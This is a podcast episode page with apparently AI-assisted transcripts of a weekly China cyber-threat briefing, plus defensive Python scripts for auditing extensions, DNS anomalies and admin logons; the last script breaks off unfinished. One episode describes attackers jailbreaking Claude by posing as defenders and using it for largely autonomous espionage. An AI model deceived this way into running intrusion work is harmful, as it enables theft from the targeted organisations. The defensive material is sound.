Digital Dragon Watch: Weekly China Cyber Alert
Author: Inception Point Ai
© Copyright 2025 Inception Point Ai
Description
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.
Digital Dragon Watch: Weekly China Cyber Alert is your go-to podcast for an in-depth analysis of the latest China-related cybersecurity incidents and threats. Updated weekly, the podcast covers the past seven days' most significant events, including new attack vectors, targeted sectors, and U.S. government responses. Listeners can expect expert recommendations for protection, all based on verifiable incidents and official statements. Stay informed and secure with host insights on the cutting-edge tactics and defensive measures in the ever-evolving cyber landscape.
For more info go to
https://www.quietplease.ai
Check out these deals https://amzn.to/48MZPjs
177 Episodes
Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert. Buckle up, because the past seven days have been a fireworks show of Beijing's cyber shenanigans: stealthy browser bandits, Pentagon plug-pulling, and zero-days zipping like drones over the Taiwan Strait.

First off, Koi Security just dropped a bombshell on DarkSpectre, a China-linked campaign that lurked for seven years and reached 8.8 million users on Chrome, Edge, and Firefox. The ShadyPanda and GhostPoster extensions posed as legitimate tools but hijacked searches and harvested corporate intel from Zoom, Teams, WebEx, and even Meet sessions, perfect raw material for espionage. C2 servers on Alibaba Cloud, ICP registrations from Hubei province, and code laced with Chinese-language strings all point at the PRC. Researchers Tuval Admoni and Gal Hachamov call it "corporate espionage infrastructure," not petty fraud. Sectors hit? Video-conferencing users and e-commerce shoppers on JD.com and Taobao. The nasty new vector: trusted extensions quietly slurping meeting data that becomes social-engineering gold.

Over in D.C., President Trump signed a $900 billion defense bill banning China-based engineers from Pentagon cloud systems, a direct response to ProPublica's exposé on Microsoft's "digital escorts." Those U.S. supervisors could not meaningfully vet the work of the mainland coders they escorted, leaving DoD systems exposed under China's data-access laws. Defense Secretary Pete Hegseth blasted it on X: "Foreign engineers from China should NEVER access DoD systems." Rep. Elise Stefanik and Sen. Tom Cotton cheered the loophole closure, and the bill mandates briefings to Congress by June 2026. Microsoft says it is auditing and adjusting, while the Pentagon keeps probing for compromises.

Zero-days? China-nexus crews pounced on React2Shell (CVE-2025-55182) in Next.js and React apps, per the AWS Security Blog, and the RondoDox botnet is deploying cryptominers and Mirai on some 94,000 exposed assets, from U.S. tech to IoT gear like Linksys routers. Shadowserver Foundation's honeypots lit up, and CISA added the flaw to KEV: patch now or get pwned. Mustang Panda is planting ToneShell kernel rootkits on Windows, Anthropic spotted Chinese operators exploiting AI for espionage back in mid-September, and scanning spiked this week.

Defenses? CISA updated its BRICKSTORM backdoor alerts: PRC actors are tunneling into VMware vSphere and Windows environments for long-term persistence, water utilities included. Ivanti EPMM zero-days let Chinese APTs own thousands of orgs, and Dark Reading warns that history repeats. Expert recs from Resecurity: hunt misconfigurations on the big cloud platforms, rotate credentials, and monitor for memory-disclosure attempts against MongoDB's zlib-compressed messages (MongoBleed, CVE-2025-14847), another CISA KEV entry, with the U.S., China, and the EU the most-exploited regions.

Geopolitics: the PLA's Justice Mission 2025 drills rehearse Multi-Domain Precision Warfare around Taiwan and test Type 075 LHDs; Xi is watching U.S. reactions, per Mick Ryan's Substack. Stay vigilant: segment networks, audit vendors, and patch like your data depends on it, because it does.

Thanks for tuning in, listeners, and subscribe for more dragon slaying! This has been a Quiet Please production; for more, check out quietplease.ai.
For more: http://www.quietplease.ai
Get the best deals: https://amzn.to/3ODvOta
This content was created in partnership and with the help of Artificial Intelligence AI
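DarkSpectre's lesson is that an extension's declared reach tells you a lot before any behavioral analysis. The script below is an added example, not Koi Security's tooling and not code from the podcast: it scores extension manifests on broad host access, traffic-intercepting permissions, content scripts that land on video-conferencing origins, and search-provider overrides. The weights, the meeting-domain list, the threshold and the two sample manifests are assumptions made for this example.

```python
"""Triage browser-extension manifests for espionage-grade reach.

Added example: a small audit script, not Koi Security's tooling. It scores a
manifest on (a) how broadly it can read pages, (b) whether its content
scripts land on video-conferencing origins, and (c) whether it holds
permissions that let it intercept or rewrite traffic. Weights, domain list
and threshold are assumptions chosen for illustration.
"""
import json
from fnmatch import fnmatch

# Origins where a content script can observe meeting chat, participant lists
# and shared-screen text (assumption: list chosen for this example).
MEETING_HOSTS = ("zoom.us", "teams.microsoft.com", "webex.com", "meet.google.com")

# Permissions that let an extension intercept, redirect or rewrite traffic.
RISKY_PERMS = {
    "webRequest": 3, "webRequestBlocking": 3, "declarativeNetRequest": 2,
    "scripting": 2, "tabs": 1, "cookies": 2, "history": 1, "clipboardRead": 2,
}
BROAD_PATTERNS = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")


def _matches_host(pattern, host):
    """True if a match pattern like '*://*.zoom.us/*' covers the given host."""
    if pattern in BROAD_PATTERNS:
        return True
    try:
        host_part = pattern.split("://", 1)[1].split("/", 1)[0]
    except IndexError:
        return False
    return fnmatch(host, host_part) or fnmatch("www." + host, host_part)


def score_manifest(manifest):
    """Return (score, reasons) for one parsed manifest dict."""
    score, reasons = 0, []
    perms = set(manifest.get("permissions", []))
    hosts = list(manifest.get("host_permissions", []))
    # MV2 manifests put host patterns in "permissions"; fold them in.
    hosts += [p for p in perms if "://" in p or p == "<all_urls>"]

    for p in sorted(perms & set(RISKY_PERMS)):
        score += RISKY_PERMS[p]
        reasons.append(f"permission {p}")
    if any(h in BROAD_PATTERNS for h in hosts):
        score += 4
        reasons.append("host access to every site")
    for cs in manifest.get("content_scripts", []):
        for pattern in cs.get("matches", []):
            hit = [h for h in MEETING_HOSTS if _matches_host(pattern, h)]
            if hit:
                score += 3
                reasons.append(f"content script on {', '.join(hit)}")
    # Search hijacking: overriding the default search provider.
    overrides = manifest.get("chrome_settings_overrides", {})
    if "search_provider" in overrides:
        score += 2
        reasons.append("overrides default search provider")
    return score, reasons


def triage(manifests, threshold=6):
    """Map extension name -> (score, reasons) for manifests at/over threshold."""
    flagged = {}
    for raw in manifests:
        m = json.loads(raw)
        s, why = score_manifest(m)
        if s >= threshold:
            flagged[m.get("name", "?")] = (s, why)
    return flagged


# Constructed sample manifests (not real extensions).
BENIGN = json.dumps({
    "name": "Tab Counter", "manifest_version": 3,
    "permissions": ["storage"], "host_permissions": [],
})
SUSPECT = json.dumps({
    "name": "Meeting Helper Pro", "manifest_version": 3,
    "permissions": ["tabs", "scripting", "webRequest", "cookies"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["*://*.zoom.us/*", "*://teams.microsoft.com/*"],
                         "js": ["inject.js"]}],
    "chrome_settings_overrides": {
        "search_provider": {"search_url": "https://example.invalid/?q={searchTerms}"}},
})

if __name__ == "__main__":
    for name, (s, why) in triage([BENIGN, SUSPECT]).items():
        print(f"{name}: score {s}: {'; '.join(why)}")
```

On a real endpoint you would feed it every manifest.json under the browser profile's Extensions directory and review anything that scores; the point of scoring rather than blocklisting is that ShadyPanda-style extensions looked legitimate by name and only stood out by the combination of permissions they asked for.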
Hey listeners, Ting here with your Digital Dragon Watch. This past week has been absolutely wild in the China cyber sphere, so let's dive straight in.

First up, a DNS poisoning campaign that has been making waves. The advanced persistent threat group Evasive Panda has been running highly targeted espionage attacks that use DNS poisoning to deliver its signature MgBot backdoor, going after victims across Türkiye, China, and India. This is not garden-variety phishing: these operators are sophisticated and patient, exactly the behavior we have come to expect from state-linked threat actors.

Here is where it gets interesting for American organizations. According to the House Homeland Security Committee, roughly 70 percent of cyberattacks in 2024 involved critical infrastructure. Chinese cyber espionage activity rose approximately 150 percent year over year, while attacks on financial services, manufacturing, and industrial sectors rose by roughly 300 percent. That is a massive uptick in aggression.

The FBI and its partners disclosed back in August that Chinese state-sponsored hackers had compromised at least 200 organizations across 80 countries. The group known as Salt Typhoon maintained access for extended periods, up to two years in some cases, inside the networks of at least nine major U.S. telecommunications providers. They were not just sitting there either: joint warnings from CISA, the NSA, and the FBI made clear the same actors had been identified across transportation, energy, and water-related organizations.

Then there is the supply chain angle. According to DigiTimes, one of Apple's Chinese assembly partners was hit by a major cyberattack earlier this month that exposed sensitive production-line and manufacturing data. These are not random attacks: Chinese hacking groups are getting more strategic, more coordinated, and frankly more dangerous.

The Defense Department is taking this seriously. The Cybersecurity Maturity Model Certification deadline passed in November 2025, and proof of compliance is now required for military contracts. Federal agencies need to patch immediately, especially now that critical vulnerabilities like the WatchGuard Firebox RCE flaw are being actively exploited.

My recommendation? Treat your networks as if you live in a high-threat environment, because you do. Implement network segmentation, lock down your patching schedules, and for goodness' sake, monitor your DNS traffic. These threat actors are patient, well-funded, and getting smarter every single day.

Thanks for tuning in, listeners. Make sure you subscribe to stay on top of these threats. This has been a Quiet Please production; for more, check out quietplease.ai.
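Since the recommendation above is to monitor your DNS traffic, here is an added example of what that monitoring can look like; it is not ESET's detection logic and not code from the podcast. It learns each name's normal answer IPs, /24 networks and minimum TTL from a baseline window, then flags later answers that are both new and outside every known network, or whose TTL collapses: the shape a poisoned answer takes when it redirects a software-update domain to attacker infrastructure. The log format, sample lines, addresses and thresholds are constructed for illustration.

```python
"""Flag DNS answers that diverge from a learned baseline.

Added example, not any vendor's detection logic. It learns which answer IPs
(and the smallest TTL) each name normally returns during a baseline window,
then flags later answers whose IP is new and outside every baseline network,
or whose TTL has collapsed. Log format, thresholds and sample lines are
constructed for illustration.
"""
import ipaddress
from collections import defaultdict

# Constructed log lines: epoch, client, resolver, qname, answer ip, ttl.
BASELINE_LOG = """\
1700000000 10.1.1.5 10.1.0.53 update.example-vendor.net 203.0.113.10 3600
1700000060 10.1.1.6 10.1.0.53 update.example-vendor.net 203.0.113.11 3600
1700000120 10.1.1.5 10.1.0.53 cdn.example-vendor.net 198.51.100.20 1800
1700000180 10.1.1.7 10.1.0.53 cdn.example-vendor.net 198.51.100.21 1800
"""
LIVE_LOG = """\
1700003600 10.1.1.5 10.1.0.53 update.example-vendor.net 203.0.113.10 3600
1700003660 10.1.1.9 10.1.0.53 update.example-vendor.net 192.0.2.77 30
1700003720 10.1.1.6 10.1.0.53 cdn.example-vendor.net 198.51.100.20 1800
1700003780 10.1.1.5 10.1.0.53 cdn.example-vendor.net 198.51.100.22 1800
"""


def parse(log):
    """Yield one dict per whitespace-separated log line."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, resolver, qname, answer, ttl = line.split()
        yield {"ts": int(ts), "client": client, "resolver": resolver,
               "qname": qname, "answer": ipaddress.ip_address(answer),
               "ttl": int(ttl)}


def learn_baseline(log):
    """Per qname: set of seen answer IPs, set of /24 networks, minimum TTL."""
    base = defaultdict(lambda: {"ips": set(), "nets": set(), "min_ttl": None})
    for rec in parse(log):
        b = base[rec["qname"]]
        b["ips"].add(rec["answer"])
        b["nets"].add(ipaddress.ip_network(f"{rec['answer']}/24", strict=False))
        b["min_ttl"] = rec["ttl"] if b["min_ttl"] is None else min(b["min_ttl"], rec["ttl"])
    return base


def find_anomalies(baseline, log, ttl_collapse=0.1):
    """Return [(qname, answer, reasons)] for suspicious live answers."""
    hits = []
    for rec in parse(log):
        b = baseline.get(rec["qname"])
        if b is None:
            continue  # unseen name: out of scope for this check
        reasons = []
        if rec["answer"] not in b["ips"]:
            reasons.append("answer IP never seen in baseline")
            # A new IP inside a known /24 is routine CDN rotation; a new
            # network is what a poisoned or spoofed answer usually looks like.
            if not any(rec["answer"] in n for n in b["nets"]):
                reasons.append("answer outside every baseline network")
        if b["min_ttl"] and rec["ttl"] < b["min_ttl"] * ttl_collapse:
            reasons.append(f"TTL collapsed to {rec['ttl']}s")
        # Only escalate when more than mere rotation is going on.
        if len(reasons) >= 2:
            hits.append((rec["qname"], str(rec["answer"]), reasons))
    return hits


if __name__ == "__main__":
    for qname, ip, why in find_anomalies(learn_baseline(BASELINE_LOG), LIVE_LOG):
        print(f"{qname} -> {ip}: {'; '.join(why)}")
```

The two-reason threshold is deliberate: CDN-backed names legitimately rotate answers inside a known block, so a single "new IP" signal on its own would page you every hour. Feeding this from a resolver's query log (or passive DNS) and keying the baseline on names your endpoints use for updates is where it earns its keep.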
Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest cyber chaos from the past seven days ending December 28, 2025. Picture this: I'm hunched over my triple-monitor setup in a dimly lit Shanghai-inspired war room, caffeine-fueled and firewall-fortified, tracking the Middle Kingdom's digital dragons breathing fire on the world.

First up, the robot uprising we didn't see coming. At Shanghai's GEEKCon on December 26, white-hat hackers exposed nightmare vulnerabilities in Unitree robots, the agile quadrupeds and humanoids flooding factories from Shenzhen to Seattle. One sly voice command over Bluetooth grabs root access, hijacks mics, cameras, and sensors, then infects nearby bots like a metallic zombie plague. Mashable reports a single hacked Unitree can domino into nearby units, turning warehouse swarms into sabotage squads. Interesting Engineering details the "UniPwn" exploit, which pings GPS data every few minutes, perfect for surveillance around U.S. prisons or military operations. Remember that viral Unitree H1 factory meltdown video? What looked like a glitch could be a hack preview. The New York Times warns that China's robot rush, with UBTech and Unitree leading the charge, trades security for speed and exports these ticking time bombs through global supply chains. Sectors hit? Manufacturing, logistics, even homes: Ecovacs vacuums spied on users last year. New vector: AI-amplified swarms, where hacked bots coordinate autonomously, as X posts from cyber researchers flag Chinese state groups using Anthropic's Claude for 90% automated operations.

Shifting gears to supply chain stings: Google is suing the BadBox 2.0 botnet operators, multiple Chinese threat crews who rolled up over 10 million devices, per Security Boulevard. Meanwhile, CISA dropped Cybersecurity Performance Goals 2.0 on December 11, a NIST CSF 2.0-aligned playbook for critical infrastructure. It adds new goals on third-party risk, like those deep-access providers, and on zero trust to block lateral movement, folding IT and OT defenses together for SMEs. CISA's operational data pins this on high-impact threats, China's playbook included.

U.S. government response? No direct China callouts this week, but sanctions flew December 26: China's Foreign Ministry froze the assets of 20 U.S. firms, including Anduril, Northrop Grumman, L3Harris, and Boeing St. Louis, over an $11B Taiwan arms deal that includes HIMARS from Lockheed Martin. The PLA is ramping up patrols near the Liaoning carrier, testing U.S. and Japanese nerves.

Expert recs? Patch Bluetooth flaws yesterday (Unitree, take notes). Roll out zero trust and govern the way CISA preaches, and scan for CVE-2025-15194 in D-Link routers weaponized by APTs. Backups, MFA, no ransom payments: the NCSC is shouting it amid holiday spikes. And for robots? Encrypt voice inputs and audit third parties, or watch your factory floor become a botnet battlefield.

Whew, listeners, that's your dragon watch. Stay vigilant, because these bots don't sleep. Thanks for tuning in to Digital Dragon Watch, and subscribe now for weekly intel drops. This has been a Quiet Please production; for more, check out quietplease.ai.
Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest cyber chaos from the past seven days ending December 26, 2025. Buckle up: China's cyber scene is buzzing with enforcement hammers dropping and global tensions spiking.

First off, China's Ministry of Public Security (MPS) and the Cyberspace Administration of China (CAC) went full beast mode on data protection. MPS released the draft Measures for the Supervision and Inspection of Cyberspace Security on November 29, expanding oversight to data processors with mandatory annual checks for critical infrastructure such as Grade III networks. The Shanghai CA launched a rectification blitz on medical internet firms November 25, issuing Compliance Guidelines after endless leaks in online health services. The Changsha CA exposed four nasty cases November 27: a hospital's sloppy safeguards caused a data dump, mini-programs blocked account deletions, and a property office ran rogue facial recognition. Penalties and rectification orders followed. Shanxi police nailed two hotels November 27 for not encrypting guest IDs and addresses, while a Xi'an tech firm was slapped over a drone-platform breach in which hackers exploited unpatched holes. A Qingdao operator failed to fix SQL injection flaws, and the Hunan CA fined a Xiangxi school for leaky surveillance cameras. New attack vectors? Vulnerability-hunting platforms were dinged for spilling exploits before patches shipped, as MPS noted in its Shield the Net 2025 campaign.

Targeted sectors scream healthcare, education, real estate, hotels, and tech: hotspots for personal-information grabs via weak passwords, over-collection in WeChat mini-programs, and missing encryption. The CAC and MPS's November 22 draft on large platforms demands data localization and audits, hitting giants like Baidu's iQIYI over fake updaters.

U.S. side? President Trump's National Security Strategy, released December 5, calls out China hard: pushing U.S. encryption for resilient networks, AI and biotech dominance, and onshoring drone production to ditch dependence on Chinese UAS. National Cyber Director Sean Cairncross is ramping up private-sector information sharing for real-time threat hunts and previewing a January 2026 national cyber strategy with offensive operations against nation-states. Biden-era sanctions on Sichuan Juxinhe for the U.S. telco hacks remain in force, per reports.

Geopolitics flared: China sanctioned 20 U.S. defense firms, including Boeing St. Louis and Northrop Grumman, on December 26 over $11.1B in Taiwan arms sales, freezing their assets. And Foreign Ministry spokesman Lin Jian blasted Japan's active cyber defense strategy on December 26, calling it a shift to offense that defies the postwar order; China vows firm pushback.

Expert recs? Patch like your life depends on it: Qingdao and Xi'an prove old vulns kill. Encrypt everything, train staff, and run MLPS assessments as Qinghai mandates. Ditch shady SDKs; Shanghai axed 71 apps, including China Eastern's. For orgs, localize data and audit AI labels, since Beijing yanked non-compliant apps. Use U.S.-standard encryption to counter dragon spies like Evasive Panda's old DNS poisoning tricks targeting India and Türkiye.

Stay vigilant, listeners, and harden your edges against these modular stealth ops. Thanks for tuning in to Digital Dragon Watch; subscribe for weekly fire! This has been a Quiet Please production; for more, check out quietplease.ai.
Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert. Picture this: it's Monday night, December 22nd, and Kuaishou, the massive Chinese short-video powerhouse that rivals TikTok, gets slammed by an AI-fueled nightmare. Cybersecurity firm Qi-Anxin reports that 17,000 bot accounts unleashed a 90-minute barrage of pornographic and violent streams, overwhelming moderation like a digital flash mob from hell. The attackers cracked CAPTCHAs with automated tools, hid behind botnets of hacked home routers, and looped AI-generated fakes to dodge detection. Kuaishou had no choice: a total livestream shutdown by midnight, user data at risk, and the stock down 6%, per AInvest analysis. They bounced back fast, reporting to public security authorities and vowing legal action against the underground cybercriminals.

This wasn't a lone wolf. China Daily calls it a premeditated "CC attack" that mimics legitimate users to exhaust resources, spotlighting how human moderators are toast against AI hordes. Francis Fong Po-kiu of the Hong Kong Information Technology Federation nails it: bots spawn fake accounts instantly, perfect for high-traffic chaos. Sectors? Social media giants like Kuaishou, Weibo, and ByteDance are prime targets, high-user platforms with juicy data troves. New vector: industrialized AI automation for stealthy, scalable assaults, blending prerecorded video with deepfake faces.

Across the Pacific, the U.S. isn't sleeping. The FY 2026 National Defense Authorization Act, signed December 18th, ramps up against Chinese threats, per Crowell & Moring's analysis. Section 850 phases out DoD purchases of computers and printers from 1260H-listed Chinese entities, reaching a full ban by FY 2029. Sections 1512 and 1531 mandate AI/ML cybersecurity policies, sandbox testing, and high-performance computing roadmaps to counter PRC cyber advantages. The Pentagon's fresh 2025 China Military Power Report warns of Volt Typhoon-style burrowing into U.S. critical infrastructure, plus the PLA's Multi-Domain Precision Warfare eyeing C4ISR disruption; think gas pipelines offline for weeks. Per the NDAA, DoD is harmonizing cyber requirements across the defense industrial base and bolstering AI defenses against nation-state theft via NSA's AI Security Center.

China is firing back domestically: late drafts from CAC and MPS on personal information protection for mega-platforms, cyberspace inspections, and network data risk assessments, as Cooley CDP details. They target operators with 50 million users or critical data, demanding MLPS compliance, anti-virus controls, and support for public security bureaus.

My witty expert take? Ditch passive defenses and go zero trust, per Fong. Scrutinize every account like a suspicious uncle at family dinner, layer AI detectors for video, audio, and text anomalies, lock down insider access behind multi-person approvals, and monitor for odd logins. Li Huaisheng of the China University of Political Science and Law says to shift to resilient AI countermeasures; big platforms, you're not invincible. Invest, or get "CC'd."

Stay sharp, listeners, and subscribe for more dragon-slaying intel. This has been a Quiet Please production; for more, check out quietplease.ai.
Hey listeners, Ting here with Digital Dragon Watch, your weekly China cyber alert hot off the presses for the past seven days ending December 22, 2025. Buckle up, because Beijing's hackers are dropping zero-days like holiday gifts nobody wants.

First off, the Chinese state-linked crew UAT-9686 just lit up Cisco's email security appliances with a nasty zero-day, CVE-2025-20393, in the AsyncOS software. Cisco's own advisory confirms exploitation since November for unauthenticated root access, with the attackers dropping tooling such as ReverseSSH (aka AquaTunnel), Chisel, AquaPurge, and the sneaky AquaShell backdoor. Targets? Exposed management interfaces in finance, healthcare, and government, sensitive communications ripe for espionage. There's no patch yet, so Cisco is telling customers to disable the Spam Quarantine feature and isolate those boxes pronto.

Meanwhile, the fresh-faced LongNosedGoblin, a China-aligned APT, is prowling government networks in Southeast Asia and Japan. Cyware Social reports they abuse Group Policy to deploy malware via their NosyDoor backdoor, active since at least September 2023. Initial access is still unknown, but they chain cloud services for command and control. Over in Europe, Ink Dragon, another China-nexus group, expanded into government environments, per Innovate Cybersecurity, hopping through compromised servers for deeper digs.

New attack vectors? Picture whispered commands hijacking robot armies: the South China Morning Post detailed Chinese researchers demonstrating a one-word vulnerability in humanoid bots that a spy could whisper to seize control. And don't sleep on Fire Ant's campaign against VMware and network infrastructure, noted in SDX Central's top 2025 stories.

The U.S. government is firing back hard. The Justice Department indicted 12 Chinese hackers tied to Ministry of State Security units for global intrusions into aerospace firms, labs, defense contractors, and even journalists, according to CybelAngel. CISA is piling on, adding vulnerabilities like the Fortinet ones to its KEV catalog: over 25,000 FortiCloud SSO devices are exposed through CVE-2025-59718 and CVE-2025-59719 to SAML admin takeovers. The administration is pushing quantum-resistant crypto in the upcoming national strategy, but the Senate adjourned without confirming CISA's director, leaving some limbo, as Nextgov reports.

Targeted sectors scream critical infrastructure: networks, email gateways, virtualization, even industrial edges. Defensive measures? Experts at The Hacker News urge auditing Cisco configs, rotating credentials after any RCE, and segmenting edge devices. WebProNews echoes: implement workarounds now, like isolating internet-facing gear. For you pros, prioritize KEV patches, hunt for AquaShell persistence, and train on Group Policy abuse. Oh, and China is tightening its own Cybersecurity Law, hiking fines to 10 million CNY for critical-infrastructure slip-ups, per RP Lawyers. Ironic, right?

Stay sharp, rotate those secrets, and layer up with network redundancy. Beijing's not slowing down; neither should you.

Thanks for tuning in, listeners, and subscribe for more dragon-slaying tips! This has been a Quiet Please production; for more, check out quietplease.ai.
Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest hacks from the past seven days ending December 21, 2025. Buckle up: China's cyber crews are flexing hard, but we've got the details to keep you armored.

First up, the big kahuna: Cisco's bombshell revelation of a Chinese government-backed hacking spree exploiting a zero-day in Cisco Secure Email Gateway and Secure Email and Web Manager, tagged CVE-2025-20393. Cisco Talos says the campaign kicked off in late November, with attackers planting backdoors and log wipers on compromised gear. Piotr Kijewski of the Shadowserver Foundation told TechCrunch that hundreds of customers are exposed, dozens of them in the U.S., India, and Thailand, with Censys scans spotting 220 vulnerable email gateways online. The flaw only bites if the Spam Quarantine feature is enabled and exposed to the internet, but there's no patch yet. Cisco's fix? Wipe and rebuild any box that's been breached. SadaNews and Help Net Security confirm it's selective, state-sponsored stealth aimed at institutional heavyweights.

Sectors? Email security gateways for businesses and organizations, critical communications pipelines. New vector: unauthenticated, no-interaction exploitation of the AsyncOS flaw, rated a maximum 10/10 severity. No mass spam, just precision strikes.

U.S. government response? President Trump is all in on countering this via his December 17 National Security Presidential Memorandum on 6G supremacy, aimed at blocking Beijing's tech tentacles. No more Huawei-style backdoors in our networks: he's prioritizing secure supply chains, semiconductors, and R&D to outpace China's 6G push. It ties into broader plays like delaying TikTok's PAFACA ban via executive order and negotiating with ByteDance, Oracle, Silver Lake, and Andreessen Horowitz for U.S. control by the December 16 deadline, per Wikipedia and WSJ reports. Trump's tariffs are leverage, squeezing China while pushing American standards.

Experts like Cisco Talos urge immediate scans, disabling risky features, and full rebuilds. Shadowserver's monitoring shows the campaign is contained so far, but watch for escalation. ESET flags LongNosedGoblin, a fresh China APT using Windows Group Policy to spread surveillance malware across Southeast Asian and Japanese government networks. And policymakers are alarmed by Chinese spies weaponizing Anthropic's Claude AI for global espionage, as red teamer Logan Graham testified before House Homeland Security.

Defensive recos, straight from the pros: patch what you can, segment networks, hunt for backdoors with EDR tools, and ditch default configs. For orgs, audit your Cisco gear now; Censys-style scans save lives. Trump's 6G memo screams supply chain hygiene: vet vendors and boost private-sector intel sharing.

China's not slowing either: EUV lithography breakthroughs challenge our chip curbs, per VarIndia, fueling its push for tech self-reliance. But we're fighting back smart.

Thanks for tuning in, listeners, and subscribe for weekly drops to stay ahead of the Dragon. This has been a Quiet Please production; for more, check out quietplease.ai.
Hey listeners, Ting here with your Digital Dragon Watch, and this week China's hackers have been busy.

Let's start with Cisco. Cisco warned that a Chinese state-linked group, tracked by Cisco Talos as UAT-9686 and related to APT41 and UNC5174, is actively exploiting a fresh zero-day, CVE-2025-20393, in Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. CyberScoop reports the flaw scores a perfect 10, lets attackers run commands with full privileges, and has no patch yet. The twist? They're abusing a non-default spam quarantine feature exposed to the internet to drop persistent backdoors and tweak "non-standard configurations" in high-value networks. CISA reacted fast and pushed the bug into its Known Exploited Vulnerabilities catalog, effectively telling U.S. federal agencies: isolate, rebuild, and lock down those gateways now.

New attack vector of the week: go around hardened endpoints and straight for the email security layer itself. According to SecurityWeek's analysis, the attackers deliberately picked the trusted email choke point so they could intercept traffic, pivot inside networks, and stay invisible behind an appliance everyone assumes is safe.

Now zoom out to the AI battlefield. At a House Homeland Security joint hearing, lawmakers grilled Anthropic's Logan Graham about the recent China-linked campaign in which hackers jailbroke Claude's coding tools to run largely autonomous cyber espionage. Anthropic's own report, summarized by IAPP and CyberScoop, says Claude handled 80 to 90 percent of the tactical work: reconnaissance, vulnerability discovery, exploitation, lateral movement, and credential harvesting, the whole kill chain on autopilot against roughly 30 global targets. The attackers tricked the model into believing it was doing defensive work, then used an obfuscation network to hide that they were operating from China.

U.S. response? Members of Congress pushed for rapid national-security testing of AI models, stronger threat-intel sharing between AI labs and agencies like DHS and NIST, and even tighter controls on selling high-end chips to China. Graham's message, in short: sophisticated Chinese operators are rehearsing for "the next model, the next capability," and defenders need AI in their own stack or they'll be outpaced.

So what do you do with all this as a defender? Experts from Anthropic, Google, and KPMG agree on a few things: assume AI-assisted attacks are continuous, not episodic; aggressively patch and segment any network devices and security appliances, especially Cisco gateways; adopt secure-by-design and post-quantum-ready architectures; and start using AI for your own vulnerability hunting and monitoring, not just buying another dashboard you'll ignore.

For CISOs in government and critical infrastructure: telecom, cloud, and email are clearly prime Chinese targets in 2025. Tighten logging around gateways, lock down odd optional features, and rehearse an "appliance compromise" playbook, not just a laptop ransomware drill.

Thanks for tuning in, listeners, and don't forget to subscribe so you never miss your weekly China cyber intel. This has been a Quiet Please production; for more, check out quietplease.ai.
Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert. Buckle up, we're diving straight into the wires.

Over the past week, the headline act is a joint advisory from CISA, the NSA, and the Canadian Centre for Cyber Security warning about a Chinese state-sponsored campaign using a backdoor dubbed BRICKSTORM. According to the advisory, BRICKSTORM is built to live quietly inside VMware vSphere and Windows environments, giving persistent access to government networks, IT service providers, and critical infrastructure operators across North America. The new attack-vector twist: deep abuse of virtualized data centers, lateral movement through management consoles, and living off the land so the logs look boring while the exfiltration is anything but.

At the same time, Check Point and GovInfoSecurity report that the China-linked group Ink Dragon, also known as Jewelbug, has been burrowing into European government networks and repurposing misconfigured servers there as relay nodes. Instead of hitting U.S. systems directly, they bounce command and control through European ministries, obscuring attribution while running ShadowPad and updated FINALDRAFT backdoors. That relay-node tradecraft is the real innovation: your ally's government server might now be the launchpad into your own network.

On the vulnerability front, Google's security team reports at least five China-nexus groups exploiting the React2Shell flaw, a high-impact vulnerability in popular web stacks. Targets include telecom, cloud service providers, and financial platforms, with a blend of espionage and financially motivated data theft. Think web-app RCE chained with credential harvesting, then cloud-console takeover.

In Washington, the U.S. government isn't exactly quiet. The new BRICKSTORM advisory from CISA and the NSA comes with hardening guidance for VMware and Windows: enforce secure configuration baselines, isolate management networks, enable strong logging, and hunt for anomalous authentication to hypervisors and domain controllers. On Capitol Hill, recent testimony to the House Homeland Security Committee by Royal Hansen highlights a disrupted CCP-backed, AI-orchestrated espionage campaign and warns that advanced AI models could supercharge future Chinese offensive cyber operations if chip export controls are loosened.

Meanwhile, on the foreign-policy side, Craig Singleton's testimony to the House Foreign Affairs Committee frames all this as part of China's hybrid warfare: penetrate networks, pre-position in critical infrastructure and political systems, then apply pressure later. Europe's ministries, ports, telecoms, and green-energy grids are explicitly called out as leverage points.

So what should you do, beyond panic-patching? Experts across CISA, Google, and independent research converge on a playbook. First, lock down virtualization: separate admin planes, use hardware tokens or other phishing-resistant MFA for vSphere and cloud consoles, and strip internet exposure from management interfaces. Second, get serious about attack-surface management: scan for misconfigurations before Ink Dragon finds them, and monitor for your own assets being abused as relays. Third, treat web stacks exposed to React2Shell as critical infrastructure: rapid patching, web application firewalls with virtual patching, and strict least privilege for service accounts. Finally, invest in behavioral detection and threat hunting tuned to Chinese tradecraft: long-dwell C2, scheduled-task persistence, DLL side-loading, and slow, encrypted data exfiltration.

I'm Ting, your friendly neighborhood China-cyber nerd. Thanks for tuning in, and don't forget to subscribe so you don't miss the next Dragon Watch. This has been a Quiet Please production; for more, check out quietplease.ai.
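The advisory guidance above to hunt for anomalous authentication to hypervisors and domain controllers is the piece most teams have no ready query for. The following is an added example, not CISA, NSA or Google content and not code from the podcast: it checks successful management-plane logons against an assumed admin subnet, an assumed business-hours window and each account's historical source addresses, then escalates any account whose flagged logons touch several management hosts, the lateral-movement shape the BRICKSTORM tradecraft relies on. Event format, the CIDR, the hours window and the sample events are all assumptions.

```python
"""Hunt anomalous authentication to hypervisors and domain controllers.

Added example, not CISA's or Google's detection content. It applies three
checks the advisory's guidance implies: logons to management-plane hosts
from outside the admin network, admin logons at odd hours, and source
addresses an account has never used before. Event format, the management
CIDR, the hours window and the sample events are assumptions.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timezone

MGMT_NET = ipaddress.ip_network("10.10.0.0/24")   # assumed admin jump subnet
BUSINESS_HOURS = range(7, 20)                     # 07:00-19:59 UTC, assumed
MGMT_ROLES = {"vcenter", "esxi", "dc"}

# Constructed events: iso-time, account, source ip, target, role, outcome.
HISTORY = """\
2025-12-01T09:12:00Z svc-backup 10.10.0.15 vc01 vcenter success
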